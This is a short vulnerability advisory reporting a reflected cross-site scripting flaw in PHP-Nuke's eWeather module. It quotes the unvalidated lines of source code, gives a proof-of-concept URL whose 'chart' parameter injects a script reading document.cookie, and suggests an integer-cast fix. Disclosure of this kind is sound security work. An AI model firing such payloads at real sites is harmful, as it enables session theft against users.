SecurityvulnsSECURITYVULNS:DOC:19408XSS in PHP-Nuke (eWeather module)
//////////XSS in PHP-Nuke (eWeather module)
PHP-Nuke (http://phpnuke.org):
PHP-Nuke is a news automated system specially designed to be used in
Intranets and Internet. The Administrator has total control of his web site,
registered users, and he will have in the hand a powerful assembly of tools
to maintain an active and 100% interactive web site using databases.
eWeather module (http://www.janitorialservice.us):
Weather module based on eWeather.biz data with 3 additional blocks
2 side and one center block.
///Details
From source-code of /modules/eWeather/index.php
Line 35: $zipCode=$chart;
Line 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";
"chart" variable is unvalidated.
///Exploit
http://example.net/modules.php?name=eWeather&chart=[XSS]
http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E
///Fix
Change line 35 to "$zipCode=(int)$chart;"
///Author:
NetJackal